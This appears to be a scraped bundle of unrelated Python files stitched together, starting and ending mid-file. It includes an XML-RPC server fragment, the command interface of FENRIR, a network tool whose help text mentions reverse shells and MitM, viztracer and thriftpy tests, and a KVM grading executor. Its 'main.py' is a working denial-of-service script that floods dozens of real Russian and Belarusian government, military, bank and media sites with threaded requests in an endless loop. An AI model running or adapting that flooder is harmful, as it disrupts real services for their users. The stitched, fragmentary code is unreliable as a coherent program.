accessory = self.__accessories[name]
if accessory:
return accessory.start(discriminator)
return False
def stop(self, name):
accessory = self.__accessories[name]
if accessory:
return accessory.stop()
return False
def reboot(self, name, discriminator):
accessory = self.__accessories[name]
if accessory:
return accessory.stop() and accessory.start(discriminator)
return False
def ping(self):
return True
def __startXMLRPCServer(self):
self.server = SimpleXMLRPCServer((IP, PORT))
self.server.register_function(self.start, 'start')
self.server.register_function(self.stop, 'stop')
self.server.register_function(self.reboot, 'reboot')
self.server.register_function(self.ping, 'ping')
self.server_thread = threading.Thread(target=self.__handle_request)
self.server_thread.start()
def __handle_request(self):
self.__should_handle_requests = True
while self.__should_handle_requests:
self.server.handle_request()
def __stopXMLRPCServer(self):
self.__should_handle_requests = False
# handle_request will wait until it receives a message, so let's send a ping to the server
client = ServerProxy('http://' + IP + ':' +
str(PORT) + '/', allow_none=True)
client.ping()
|
Interface.py | # coding=utf-8
from cmd2 import Cmd
from binascii import hexlify, unhexlify
from FENRIR2 import *
import threading
class Interface(Cmd):
FENRIR = FENRIR()
FenrirThread = None
stop_event = None
promptBase = "FENRIR"
prompt = "\n\033[1m\033[31m" + promptBase + " >\033[0m "
intro = """\n\033[1m
,a8b
,,od8 8
d8' 8b
d8'ba aP'
o8' aP'
YaaaP' ba
\033[31mFENRIR\033[0m\033[1m Y8' 88
,8\" `P
,d8P' ba
ooood8888888P\"\"\"' P'
,od 8
,dP o88o o'
,dP 8 8
,d' oo 8 ,8
$ d$\"8 8 Y Y o 8
d d d8 od \"\"boooaaaaoob d\"\"8 8
$ 8 d ood'-I 8 b 8 '8 b
$ $ 8 8 d d8 `b d '8 b
$ $ 8 b Y d8 8 ,P '8 b
`$$ Yb b 8b 8b 8 8, '8 o,
`Y b 8o $$ d b b $o
8 '$ 8$,,$\" $ $o '$o$$
$o$$P\" $$o$
\033[0m"""
def __init__(self):
Cmd.__init__(self)
### TOOLBOX ###
def hexToStr(self, hexstr):
string = hexlify(hexstr).decode('ascii')
return string[:2] + ":" + string[2:4] + ":" + string[4:6] + ":" + string[6:8] + ":" + string[8:10] + ":" + string[-2:]
def strToHex(self, string):
hexes = string.split(":")
hexstr = ''.join(hexes).encode("ascii")
return unhexlify(hexstr)
def changeRunningState(self, state):
if state == True:
self.prompt = "\n\033[1m\033[32m" + self.promptBase + " >\033[0m "
self.FENRIR.isRunning = True
elif state == False:
self.prompt = "\n\033[1m\033[31m" + self.promptBase + " >\033[0m "
self.FENRIR.isRunning = False
def do_create_virtual_tap(self,s):
self.FENRIR.createTap()
def help_create_virtual_tap(self):
print("Creates the virtual tap for FENRIR core module")
def do_destroy_virtual_tap(self,s):
self.FENRIR.downTap()
def help_destroy_virtual_tap(self):
print("Deletes the virtual tap for FENRIR core module")
def do_show(self,argString):
args = argString.split()
if len(args) != 1:
print("*** Invalid number of arguments")
self.help_show()
else:
if args[0] == "tap" and self.FENRIR.tap != None:
print("tap :")
print("Address ===> " + self.FENRIR.tap.addr)
print("MAC ===> " + self.hexToStr(self.FENRIR.tap.hwaddr))
print("mtu ===> " + str(self.FENRIR.tap.mtu))
elif args[0] == "host_ip" and self.FENRIR.hostip != None:
print("host_ip ===> " + self.FENRIR.hostip)
elif args[0] == "host_mac" and self.FENRIR.hostmac != None:
print("host_mac ===> " + self.hexToStr(self.FENRIR.hostmac))
elif args[0] == "rules":
if self.FENRIR.FenrirFangs.ruleCount == 0:
print("No rule added (yet)")
else:
num = 0
for rule in self.FENRIR.FenrirFangs.userRules:
num += 1
print("Rule " + str(num) +" : \n\tport = " + str(rule.dst_port) + "\n\ttype = " + rule.type + "\n\tproto = " + rule.proto)
elif args[0] == "netIface":
print("netIface ===> " + self.FENRIR.switchIface)
elif args[0] == "hostIface":
print("hostIface ===> " + self.FENRIR.LhostIface)
elif args[0] == "all":
self.do_show("tap")
self.do_show("host_ip")
self.do_show("host_mac")
self.do_show("hostIface")
self.do_show("netIface")
self.do_show("rules")
def help_show(self):
print("USAGE : show <attribute>")
def complete_show(self, match, line, bindex, eindex):
COMPLETION_ARRAY = ('tap', 'host_ip', 'host_mac', 'rules', 'hostIface ', 'netIface ', 'all')
return [i for i in COMPLETION_ARRAY if i.startswith(match)]
def do_set(self, argString):
args = argString.split()
if len(args) != 2:
print("*** Invalid number of arguments")
self.help_set()
else:
if args[0] == "debug":
Cmd.do_set(self, argString)
elif args[0] == "host_mac":
attrValue = self.strToHex(args[1])
else:
attrValue = args[1]
if self.FENRIR.setAttribute(args[0], attrValue) == False:
print("*** Invalid argument")
self.help_set()
else:
print(args[0] + " ===> " + args[1])
def help_set(self):
print("USAGE : set <attribute> <value>")
print("Attributes = host_ip, host_mac, netIface, hostIface, verbosity <0-3>")
def complete_set(self, match, line, bindex, eindex):
COMPLETION_ARRAY = ('host_ip ', 'host_mac ', 'verbosity ', 'netIface ', 'hostIface ')
if bindex == 4:
return [i for i in COMPLETION_ARRAY if i.startswith(match)]
else:
return ('')
def do_stats(self,s):
if self.FENRIR.isRunning == True:
print("Packet(s) processed by FENRIR : " + str(self.FENRIR.pktsCount))
def do_add_reverse_rule(self, argString):
args = argString.split()
if len(args) != 3:
print("*** Invalid number of arguments")
self.help_add_rule()
else:
try:
args[0] = int(args[0])
except:
print("*** First agument must be a number")
self.help_add_rule()
TYPES_ARRAY = ('unique', 'multi')
if args[0] <= 65535 and args[0] > 0 and args[1] in TYPES_ARRAY:
self.FENRIR.FenrirFangs.addRule(args[0], args[2], args[1])
print("New rule added : \n\tport = " + str(args[0]) + "\n\ttype = " + args[1] + "\n\tproto = " + args[2])
else:
print("*** Invalid arguments")
self.help_add_rule()
def help_add_reverse_rule(self):
print("USAGE : add_reverse_rule <port> <type = unique> <proto = IP>")
print("Interface for adding port-specific rules to allow reverse connection to reach FENRIR. This is useful for reverse shell or for server-based exploits & fun (Responder)")
print("Types include : \n\tunique = rule is triggered once before being deleted (useful to get a reverse shell from one host) \n\tmulti = rule can be triggered multiple times (useful for MitM stuff)")
def complete_add_reverse_rule(self, match, line, bindex, eindex):
if bindex <= 16:
return (' ')
elif bindex > 16:
if line.count(' ') == 2:
COMPLETION_ARRAY = ('unique ', 'multi ')
return [i for i in COMPLETION_ARRAY if i.startswith(match)]
elif line.count(' ') >= 3:
return ('')
else:
return ('')
else:
return ('')
def do_autoconf(self,s):
print("Running initAutoconf...")
self.FENRIR.initAutoconf()
self.do_show('all')
def help_autoconf(self):
print("Runs the auto-configuration module")
def do_run(self,s):
if self.FENRIR.tap == None:
self.do_create_virtual_tap("")
if self.FENRIR.tap != None and self.FENRIR.hostip != '' and self.FENRIR.hostmac != '':
self.FENRIR.setAttribute("verbosity", 0)
self.changeRunningState(True)
self.stop_event = threading.Event()
self.FenrirThread = threading.Thread(target=self.FENRIR.initMANGLE, args=(self.stop_event,))
self.FenrirThread.daemon = True
self.FenrirThread.start()
# self.FENRIR.initMANGLE()
else:
print("*** FENRIR PANIC : Configuration problem")
self.help_run()
def help_run(self):
print("USAGE : run")
print("This will launch FENRIR core in a new thread and remove any verbosity !")
print("(Disclaimer : you must have run the auto-configuration module or given correct information manually before running this command ! You need at least host_ip, host_mac and a virtual tap created !)")
def do_run_debug(self,s):
if self.FENRIR.tap == None:
self.do_create_virtual_tap("")
if self.FENRIR.tap != None and self.FENRIR.hostip != '' and self.FENRIR.hostmac != '':
self.changeRunningState(True)
self.stop_event = threading.Event()
self.FENRIR.initMANGLE(self.stop_event)
else:
print("*** FENRIR PANIC : Configuration problem")
self.help_run_debug()
def help_run_debug(self):
print("USAGE : run_debug")
print("This will launch FENRIR core WITHOUT creating a new thread !")
print("(Disclaimer : you must have run the auto-configuration module or given correct information manually before running this command ! You need at least host_ip, host_mac and a virtual tap created !)")
def do_stop(self,s):
if self.FENRIR.isRunning == True:
self.stop_event.set()
self.FenrirThread.join()
self.changeRunningState(False)
print("Fenrir was stopped")
else:
print("Fenrir is not running at the moment...")
def help_stop(self):
print("Stops the FENRIR thread")
def do_cookie(self,s):
print("This cookie machine is brought to you by Valérian LEGRAND valerian.legrand@orange.com\n")
print("COOKIE COOKIE COOKIE")
print("COOKIE COOKIE COOKIE")
print("COOKIE COOKIE COOKIE")
print("COOKIE COOKIE COOKIE")
print("COOKIE COOKIE COOKIE")
def do_exit(self, s):
return True
def do_help(self,s):
if s == '' :
print("FENRIR Commands :")
print("\tcookie")
print("\tcreate_virtual_tap")
print("\tdestroy_virtual_tap")
print("\tadd_reverse_rule")
print("\trun")
print("\trun_debug")
print("\tset")
print("\tshell")
print("\tshortcuts")
print("\tautoconf")
print("\tstop")
print("\tquit")
print("\thelp")
else :
Cmd.do_help(self,s)
def complete_help(self, match, line, bindex, eindex):
COMPLETION_ARRAY = ('cookie', 'create_virtual_tap', 'destroy_virtual_tap', 'add_reverse_rule', 'run', 'run_debug', 'set', 'shell', 'shortcuts', 'autoconf', 'stop', 'quit', 'exit', 'help')
return [i for i in COMPLETION_ARRAY if i.startswith(match)]
if __name__ == '__main__':
app = Interface()
app.cmdloop()
|
mock_xml_file_server.py | import os
import SimpleHTTPServer
import SocketServer
from threading import Thread
import logging
log = logging.getLogger(__name__)
PORT = 8999
def serve(port=PORT):
'''Serves test XML files over HTTP'''
# Make sure we serve from the tests' XML directory
os.chdir(os.path.join(os.path.dirname(os.path.abspath(__file__)),
'data-samples'))
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
class TestServer(SocketServer.TCPServer):
allow_reuse_address = True
httpd = TestServer(("", PORT), Handler)
info = 'Serving test HTTP server at port', PORT
print info
log.info(info)
httpd_thread = Thread(target=httpd.serve_forever)
httpd_thread.setDaemon(True)
httpd_thread.start()
|
test_multiprocess.py | # Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://github.com/gaogaotiantian/viztracer/blob/master/NOTICE.txt
import os
import sys
import multiprocessing
import platform
import unittest
from .cmdline_tmpl import CmdlineTmpl
file_parent = """
import subprocess
subprocess.run(["python", "child.py"])
subprocess.run(("python", "child.py"))
subprocess.run("python child.py")
"""
file_child = """
def fib(n):
if n < 2:
return 1
return fib(n-1) + fib(n-2)
fib(5)
"""
file_fork = """
import os
import time
pid = os.fork()
if pid > 0:
time.sleep(0.1)
print("parent")
else:
print("child")
"""
file_multiprocessing = """
import multiprocessing
from multiprocessing import Process
import time
def fib(n):
if n < 2:
return 1
return fib(n-1) + fib(n-2)
def f():
fib(5)
if __name__ == "__main__":
fib(2)
p = Process(target=f)
p.start()
p.join()
time.sleep(0.1)
"""
file_multiprocessing_overload_run = """
import multiprocessing
from multiprocessing import Process
import time
class MyProcess(Process):
def run(self):
self.fib(5)
def fib(self, n):
if n < 2:
return 1
return self.fib(n-1) + self.fib(n-2)
if __name__ == "__main__":
p = MyProcess()
p.start()
p.join()
time.sleep(0.1)
"""
file_multiprocessing_stack_limit = """
import multiprocessing
from multiprocessing import Process
import time
from viztracer import get_tracer
def fib(n):
if n < 2:
return 1
return fib(n-1) + fib(n-2)
def f():
fib(5)
def cb(tracer):
print(tracer)
tracer.max_stack_depth = 2
if __name__ == "__main__":
get_tracer().set_afterfork(cb)
p = Process(target=f)
p.start()
p.join()
time.sleep(0.1)
"""
file_pool = """
from multiprocessing import Process, Pool
import os
import time
def f(x):
return x*x
if __name__ == "__main__":
process_num = 5
with Pool(processes=process_num) as pool:
print(pool.map(f, range(10)))
for i in pool.imap_unordered(f, range(10)):
print(i)
res = pool.apply_async(f, (20,)) # runs in *only* one process
print(res.get(timeout=1)) # prints "400"
res = pool.apply_async(os.getpid, ()) # runs in *only* one process
print(res.get(timeout=1)) # prints the PID of that process
multiple_results = [pool.apply_async(os.getpid, ()) for i in range(process_num)]
print([res.get(timeout=1) for res in multiple_results])
"""
class TestSubprocess(CmdlineTmpl):
def setUp(self):
with open("child.py", "w") as f:
f.write(file_child)
def tearDown(self):
os.remove("child.py")
def test_basic(self):
def check_func(data):
pids = set()
for entry in data["traceEvents"]:
pids.add(entry["pid"])
self.assertEqual(len(pids), 4)
self.template(["viztracer", "-o", "result.json", "cmdline_test.py"],
expected_output_file="result.json", script=file_parent, check_func=check_func)
class TestMultiprocessing(CmdlineTmpl):
def test_os_fork(self):
def check_func(data):
pids = set()
for entry in data["traceEvents"]:
pids.add(entry["pid"])
self.assertGreater(len(pids), 1)
if sys.platform in ["linux", "linux2"]:
self.template(["viztracer", "-o", "result.json", "cmdline_test.py"],
expected_output_file="result.json", script=file_fork, check_func=check_func)
def test_multiprosessing(self):
def check_func(data):
pids = set()
for entry in data["traceEvents"]:
pids.add(entry["pid"])
self.assertGreater(len(pids), 1)
self.template(["viztracer", "-o", "result.json", "cmdline_test.py"],
expected_output_file="result.json",
script=file_multiprocessing,
check_func=check_func,
concurrency="multiprocessing")
def test_ignore_multiprosessing(self):
def check_func(data):
pids = set()
for entry in data["traceEvents"]:
pids.add(entry["pid"])
self.assertEqual(len(pids), 1)
self.template(["viztracer", "-o", "result.json", "--ignore_multiproces", "cmdline_test.py"],
expected_output_file="result.json",
script=file_multiprocessing,
check_func=check_func,
concurrency="multiprocessing")
def test_multiprocessing_overload(self):
def check_func(data):
fib_count = 0
pids = set()
for entry in data["traceEvents"]:
pids.add(entry["pid"])
fib_count += 1 if "fib" in entry["name"] else 0
self.assertGreater(len(pids), 1)
self.assertEqual(fib_count, 15)
self.template(["viztracer", "-o", "result.json", "cmdline_test.py"],
expected_output_file="result.json",
script=file_multiprocessing_overload_run,
check_func=check_func,
concurrency="multiprocessing")
@unittest.skipIf(int(platform.python_version_tuple()[1]) >= 8
or "win32" in sys.platform, "Does not support Windows, Don't know why stuck on 3.8+")
def test_multiprocessing_pool(self):
# I could not reproduce the stuck failure locally. This is only for
# coverage anyway, just skip it on 3.8+
def check_func(data):
pids = set()
for entry in data["traceEvents"]:
pids.add(entry["pid"])
self.assertGreater(len(pids), 1)
self.template(["viztracer", "-o", "result.json", "cmdline_test.py"],
expected_output_file="result.json",
script=file_pool,
check_func=check_func,
concurrency="multiprocessing")
def test_multiprosessing_stack_depth(self):
def check_func(data):
for entry in data["traceEvents"]:
self.assertNotIn("fib", entry["name"].split())
if multiprocessing.get_start_method() == "fork":
self.template(["viztracer", "-o", "result.json", "cmdline_test.py"],
expected_output_file="result.json",
script=file_multiprocessing_stack_limit,
check_func=check_func,
concurrency="multiprocessing")
|
main.py | import requests
import threading
def main():
links = [ "https://www.gazprom.ru/",
"https://lukoil.ru/",
"https://magnit.ru/",
"https://www.nornickel.com/",
"https://www.surgutneftegas.ru/",
"https://www.tatneft.ru/",
"https://www.evraz.com/ru",
"https://nlmk.com/",
"https://www.sibur.ru/",
"https://www.severstal.com/",
"https://www.metalloinvest.com/",
"https://nangs.org/",
"https://rmk-group.ru/ru",
"https://www.tmk-group.ru/",
"https://ya.ru/",
"https://www.polymetalinternational.com/ru",
"https://www.uralkali.com/ru",
"https://www.eurosib.ru/",
"https://omk.ru/",
"https://www.sberbank.ru/",
"https://www.vtb.ru/",
"https://www.gazprombank.ru/",
"https://www.gosuslugi.ru/",
"https://www.mos.ru/uslugi/",
"http://kremlin.ru/",
"http://government.ru/",
"https://mil.ru/",
"https://www.nalog.gov.ru/",
"https://customs.gov.ru/",
"https://pfr.gov.ru/",
"https://rkn.gov.ru/",
"https://mail.rkn.gov.ru/",
"https://cloud.rkn.gov.ru/",
"https://mvd.gov.ru/",
"https://pwd.wto.economy.gov.ru/",
"https://stroi.gov.ru/",
"https://proverki.gov.ru/",
"https://ria.ru/",
"https://gazeta.ru/",
"https://kp.ru/",
"https://riafan.ru/",
"https://pikabu.ru/",
"https://kommersant.ru/",
"https://mk.ru/",
"https://yaplakal.com/",
"https://rbc.ru/",
"https://bezformata.com/",
"https://shop-rt.com/",
"http://belta.by/",
"https://sputnik.by/",
"https://www.tvr.by/",
"https://www.sb.by/",
"https://belmarket.by/",
"https://www.belarus.by/",
"https://belarus24.by/",
"https://ont.by/",
"https://www.024.by/",
"https://www.belnovosti.by/",
"https://mogilevnews.by/",
"https://www.mil.by/",
"https://yandex.by/",
"https://www.slonves.by/",
"http://www.ctv.by/",
"https://radiobelarus.by/",
"https://radiusfm.by/",
"https://alfaradio.by/",
"https://radiomir.by/",
"https://radiostalica.by/",
"https://radiobrestfm.by/",
"https://www.tvrmogilev.by/",
"https://minsknews.by/",
"https://zarya.by/",
"https://grodnonews.by/",
"https://rec.gov.by/ru",
"https://www.mil.by/",
"http://www.government.by/",
"https://president.gov.by/ru",
"https://www.mvd.gov.by/ru",
"http://www.kgb.by/ru/",
"http://www.prokuratura.gov.by/",
"http://www.nbrb.by/",
"https://belarusbank.by/",
"https://brrb.by/",
"https://www.belapb.by/",
"https://bankdabrabyt.by/",
"https://belinvestbank.by/individual",
"https://bgp.by/ru/",
"https://www.belneftekhim.by/",
"http://belres.by/ru/",
"https://www.energo.by/",
"http://www.bellegprom.by/",
"http://mininform.gov.by/",
]
while True:
for link in links:
try:
threading.Thread(target=tryRequest, args=(link,)).start()
except:
print("Thread Error")
def tryRequest(link):
try:
result = requests.get(link)
if result:
print("Site: "+ link + " Response OK\n")
else:
print("Site: "+ link + " Response Failed\n")
except Exception as ex:
print("Site: "+ link + " Exception Error\n")
if __name__ == "__main__":
main()
|
test_protocol_cybinary.py | # -*- coding: utf-8 -*-
import multiprocessing
import os
import time
import pytest
from thriftpy._compat import u
from thriftpy.thrift import TType, TPayload
from thriftpy.transport import TSocket, TServerSocket
from thriftpy.utils import hexlify
from thriftpy._compat import PYPY
pytestmark = pytest.mark.skipif(PYPY,
reason="cython not enabled in pypy.")
if not PYPY:
from thriftpy.protocol import cybin as proto
from thriftpy.transport.memory import TCyMemoryBuffer
from thriftpy.transport.buffered import TCyBufferedTransport
class TItem(TPayload):
thrift_spec = {
1: (TType.I32, "id", False),
2: (TType.LIST, "phones", TType.STRING, False),
}
default_spec = [("id", None), ("phones", None)]
def test_write_bool():
b = TCyMemoryBuffer()
proto.write_val(b, TType.BOOL, 1)
b.flush()
assert "01" == hexlify(b.getvalue())
def test_read_bool():
b = TCyMemoryBuffer(b'\x01')
val = proto.read_val(b, TType.BOOL)
assert True is val
def test_write_i8():
b = TCyMemoryBuffer()
proto.write_val(b, TType.I08, 123)
b.flush()
assert "7b" == hexlify(b.getvalue())
def test_read_i8():
b = TCyMemoryBuffer(b'\x7b')
val = proto.read_val(b, TType.I08)
assert 123 == val
def test_write_i16():
b = TCyMemoryBuffer()
proto.write_val(b, TType.I16, 12345)
b.flush()
assert "30 39" == hexlify(b.getvalue())
def test_read_i16():
b = TCyMemoryBuffer(b"09")
val = proto.read_val(b, TType.I16)
assert 12345 == val
def test_write_i32():
b = TCyMemoryBuffer()
proto.write_val(b, TType.I32, 1234567890)
b.flush()
assert "49 96 02 d2" == hexlify(b.getvalue())
def test_read_i32():
b = TCyMemoryBuffer(b"I\x96\x02\xd2")
assert 1234567890 == proto.read_val(b, TType.I32)
def test_write_i64():
b = TCyMemoryBuffer()
proto.write_val(b, TType.I64, 1234567890123456789)
b.flush()
assert "11 22 10 f4 7d e9 81 15" == hexlify(b.getvalue())
def test_read_i64():
b = TCyMemoryBuffer(b"\x11\"\x10\xf4}\xe9\x81\x15")
assert 1234567890123456789 == proto.read_val(b, TType.I64)
def test_write_double():
b = TCyMemoryBuffer()
proto.write_val(b, TType.DOUBLE, 1234567890.1234567890)
b.flush()
assert "41 d2 65 80 b4 87 e6 b7" == hexlify(b.getvalue())
def test_read_double():
b = TCyMemoryBuffer(b"A\xd2e\x80\xb4\x87\xe6\xb7")
assert 1234567890.1234567890 == proto.read_val(b, TType.DOUBLE)
def test_write_string():
b = TCyMemoryBuffer()
proto.write_val(b, TType.STRING, "hello world!")
b.flush()
assert "00 00 00 0c 68 65 6c 6c 6f 20 77 6f 72 6c 64 21" == \
hexlify(b.getvalue())
b = TCyMemoryBuffer()
proto.write_val(b, TType.STRING, u("你好世界"))
b.flush()
assert "00 00 00 0c e4 bd a0 e5 a5 bd e4 b8 96 e7 95 8c" == \
hexlify(b.getvalue())
def test_read_string():
b = TCyMemoryBuffer(b"\x00\x00\x00\x0c"
b"\xe4\xbd\xa0\xe5\xa5\xbd\xe4\xb8\x96\xe7\x95\x8c")
assert u("你好世界") == proto.read_val(b, TType.STRING)
def test_write_message_begin():
trans = TCyMemoryBuffer()
b = proto.TCyBinaryProtocol(trans)
b.write_message_begin("test", TType.STRING, 1)
b.write_message_end()
assert "80 01 00 0b 00 00 00 04 74 65 73 74 00 00 00 01" == \
hexlify(trans.getvalue())
def test_write_message_begin_no_strict():
trans = TCyMemoryBuffer()
b = proto.TCyBinaryProtocol(trans, strict_write=False)
b.write_message_begin("test", TType.STRING, 1)
b.write_message_end()
assert "00 00 00 04 74 65 73 74 0b 00 00 00 01" == \
hexlify(trans.getvalue())
def test_read_message_begin():
b = TCyMemoryBuffer(b"\x80\x01\x00\x0b\x00\x00\x00\x04test"
b"\x00\x00\x00\x01")
res = proto.TCyBinaryProtocol(b).read_message_begin()
assert res == ("test", TType.STRING, 1)
def test_read_message_begin_not_strict():
b = TCyMemoryBuffer(b"\x00\x00\x00\x04test\x0b\x00\x00\x00\x01")
res = proto.TCyBinaryProtocol(b, strict_read=False).read_message_begin()
assert res == ("test", TType.STRING, 1)
def test_write_struct():
trans = TCyMemoryBuffer()
b = proto.TCyBinaryProtocol(trans)
item = TItem(id=123, phones=["123456", "abcdef"])
b.write_struct(item)
b.write_message_end()
assert ("08 00 01 00 00 00 7b 0f 00 02 0b 00 00 00 02 00 00 00 "
"06 31 32 33 34 35 36 00 00 00 06 61 62 63 64 65 66 00") == \
hexlify(trans.getvalue())
def test_read_struct():
b = TCyMemoryBuffer(b"\x08\x00\x01\x00\x00\x00{"
b"\x0f\x00\x02\x0b\x00\x00\x00"
b"\x02\x00\x00\x00\x06123456"
b"\x00\x00\x00\x06abcdef\x00")
b = proto.TCyBinaryProtocol(b)
_item = TItem(id=123, phones=["123456", "abcdef"])
_item2 = TItem()
b.read_struct(_item2)
assert _item == _item2
def test_write_empty_struct():
trans = TCyMemoryBuffer()
b = proto.TCyBinaryProtocol(trans)
item = TItem()
b.write_struct(item)
b.write_message_end()
assert "00" == hexlify(trans.getvalue())
def test_read_empty_struct():
b = TCyMemoryBuffer(b"\x00")
b = proto.TCyBinaryProtocol(b)
_item = TItem()
_item2 = TItem()
b.read_struct(_item2)
assert _item == _item2
def test_write_huge_struct():
b = TCyMemoryBuffer()
b = proto.TCyBinaryProtocol(b)
item = TItem(id=12345, phones=["1234567890"] * 100000)
b.write_struct(item)
b.write_message_end()
def test_read_huge_args():
class Hello(TPayload):
thrift_spec = {
1: (TType.STRING, "name", False),
2: (TType.STRING, "world", False),
}
default_spec = [("name", None), ("world", None)]
b = TCyMemoryBuffer()
item = Hello(name='我' * 326, world='你' * 1365)
p = proto.TCyBinaryProtocol(b)
p.write_struct(item)
p.write_message_end()
item2 = Hello()
p.read_struct(item2)
def test_skip_bool():
b = TCyMemoryBuffer()
proto.write_val(b, TType.BOOL, 1)
proto.write_val(b, TType.I32, 123)
b.flush()
proto.skip(b, TType.BOOL)
assert 123 == proto.read_val(b, TType.I32)
def test_skip_double():
b = TCyMemoryBuffer()
proto.write_val(b, TType.DOUBLE, 0.123425897)
proto.write_val(b, TType.I32, 123)
b.flush()
proto.skip(b, TType.DOUBLE)
assert 123 == proto.read_val(b, TType.I32)
def test_skip_string():
b = TCyMemoryBuffer()
proto.write_val(b, TType.STRING, "hello world")
proto.write_val(b, TType.I32, 123)
b.flush()
proto.skip(b, TType.STRING)
assert 123 == proto.read_val(b, TType.I32)
def test_skip_list():
b = TCyMemoryBuffer()
proto.write_val(b, TType.LIST, [5, 6, 7, 8, 9], spec=TType.I32)
proto.write_val(b, TType.I32, 123)
b.flush()
proto.skip(b, TType.LIST)
assert 123 == proto.read_val(b, TType.I32)
def test_skip_map():
b = TCyMemoryBuffer()
proto.write_val(b, TType.MAP, {"hello": 0.3456},
spec=(TType.STRING, TType.DOUBLE))
proto.write_val(b, TType.I32, 123)
b.flush()
proto.skip(b, TType.MAP)
assert 123 == proto.read_val(b, TType.I32)
def test_skip_struct():
b = TCyMemoryBuffer()
p = proto.TCyBinaryProtocol(b)
item = TItem(id=123, phones=["123456", "abcdef"])
p.write_struct(item)
p.write_message_end()
proto.write_val(b, TType.I32, 123)
b.flush()
proto.skip(b, TType.STRUCT)
assert 123 == proto.read_val(b, TType.I32)
def test_read_long_data():
val = 'z' * 97 * 1024
def serve():
server_sock = TServerSocket(
unix_socket="./thriftpy_test.sock")
server_sock.listen()
client = server_sock.accept()
t = TCyBufferedTransport(client)
proto.write_val(t, TType.STRING, val)
t.flush()
p = multiprocessing.Process(target=serve)
p.start()
time.sleep(0.1)
try:
sock = TSocket(unix_socket="./thriftpy_test.sock")
b = TCyBufferedTransport(sock)
b.open()
assert val == proto.read_val(b, TType.STRING)
sock.close()
finally:
p.terminate()
try:
os.remove("./thriftpy_test.sock")
except IOError:
pass
def test_write_wrong_arg_type():
trans = TCyMemoryBuffer()
b = proto.TCyBinaryProtocol(trans)
item = TItem(id="wrong type", phones=["123456", "abcdef"])
try:
b.write_struct(item)
except Exception:
pass
b.write_message_end()
item2 = TItem(id=123, phones=["123456", "abcdef"])
b.write_struct(item2)
b.write_message_end()
assert ("08 00 01 00 00 00 7b 0f 00 02 0b 00 00 00 02 00 00 00 "
"06 31 32 33 34 35 36 00 00 00 06 61 62 63 64 65 66 00") == \
hexlify(trans.getvalue())
def test_read_wrong_arg_type():
class TWrongTypeItem(TPayload):
thrift_spec = {
1: (TType.STRING, "id", False),
2: (TType.LIST, "phones", TType.STRING, False),
}
default_spec = [("id", None), ("phones", None)]
trans = TCyMemoryBuffer()
b = proto.TCyBinaryProtocol(trans)
item = TItem(id=58, phones=["123456", "abcdef"])
b.write_struct(item)
b.write_message_end()
item2 = TWrongTypeItem()
try:
b.read_struct(item2)
except Exception:
pass
item3 = TItem(id=123, phones=["123456", "abcdef"])
b.write_struct(item3)
b.write_message_end()
item4 = TItem()
b.read_struct(item4)
assert item3 == item4
def test_multiple_read_struct():
t = TCyMemoryBuffer()
p = proto.TCyBinaryProtocol(t)
item1 = TItem(id=123, phones=["123456", "abcdef"])
item2 = TItem(id=234, phones=["110", "120"])
p.write_struct(item1)
p.write_struct(item2)
p.write_message_end()
_item1 = TItem()
_item2 = TItem()
p.read_struct(_item1)
p.read_struct(_item2)
assert _item1 == item1 and _item2 == item2
|
kvm_executor.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""A script that starts a vm, reverts it to a known snapshot, tests a
submission bundle (submission + tests), and closes the vm"""
from __future__ import with_statement
# Use simplejson or Python 2.6 json, prefer simplejson.
try:
import simplejson as json
except ImportError:
import json
import os
import sys
import time
import logging
import signal
from threading import Thread
from subprocess import Popen
import serial
from subprocess import Popen, PIPE, STDOUT
from vmchecker.generic_executor import VM, Host
_logger = logging.getLogger('vm_executor')
class kvmHost(Host):
def getVM(self, bundle_dir, sb_cfg):
return kvmVM(self, bundle_dir, sb_cfg)
class kvmVM(VM):
hostname = 'kvm2'
def __init__(self, host, bundle_dir, sb_cfg):
VM.__init__(self, host, bundle_dir, sb_cfg)
self.hostname = self.machinecfg.get_vm_path()
self.path = self.getPath()
print self.path
def executeCommand(self,cmd):
_logger.info("executeCommand: %s" % cmd)
return self.host.executeCommand("ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "+self.username+"@"+self.IP+" "+cmd)
def power_on_kvm(self):
o = self.host.executeCommand("virsh start kvm2")
if "started" in o:
print "Exit"
sys.exit()
def start(self):
power_thd = Thread(target = self.power_on_kvm)
power_thd.start()
power_thd.join()
self.IP = self.getIP()
def stop(self):
self.host.executeCommand("virsh destroy "+self.hostname)
def revert(self, number = None):
self.stop() # just in case it's on
self.host.executeCommand("rm -f "+os.path.join(self.path,"run.qcow2"))
self.host.executeCommand("cp "+os.path.join(self.path,"image.qcow2")+" "+os.path.join(self.path,"run.qcow2"))
def copyTo(self, sourceDir, targetDir, files):
""" Copy files from host(source) to guest(target) """
for f in files:
host_path = os.path.join(sourceDir, f)
guest_path = os.path.join(targetDir, f)
if not os.path.exists(host_path):
_logger.error('host file (to send) "%s" does not exist' % host_path)
return
_logger.info('copy file %s from host to guest at %s' % (host_path, guest_path))
self.host.executeCommand("scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r "+host_path+" "+self.username+"@"+self.IP+":"+guest_path)
def copyFrom(self, sourceDir, targetDir, files):
""" Copy files from guest(source) to host(target) """
for f in files:
host_path = os.path.join(targetDir, f)
guest_path = os.path.join(sourceDir, f)
_logger.info('copy file %s from guest to host at %s' % (guest_path, host_path))
self.host.executeCommand("scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r "+self.username+"@"+self.IP+":"+guest_path+" "+host_path)
if not os.path.exists(host_path):
_logger.error('host file (received) "%s" does not exist' % host_path)
def run(self, shell, executable_file, timeout):
self.executeCommand("chmod +x "+ executable_file)
_logger.info('executing on the remote: prog=%s args=[%s] timeout=%d' % (shell, executable_file, timeout))
thd = Thread(target = self.executeCommand, args = (executable_file,))
thd.start()
if timeout==None:
thd.join()
else:
thd.join(timeout)
return thd.isAlive()
def getMac(self):
mac = self.host.executeCommand("virsh dumpxml "+self.hostname)
mac = mac[mac.find("<mac address=")+14:]
mac = mac[:mac.find("'/>")]
return mac.strip()
def getPath(self):
path = self.host.executeCommand("virsh dumpxml "+self.hostname)
path = path[path.find("<source file='")+14:]
path = path[:path.find("'/>")]
return os.path.dirname(path)
def getIP(self):
mac = self.getMac()
while True:
arps = self.host.executeCommand("arp -a").split("\n")
time.sleep(1)
for arp in arps:
if mac in arp:
IP = arp[arp.find("(")+1:arp.find(")")]
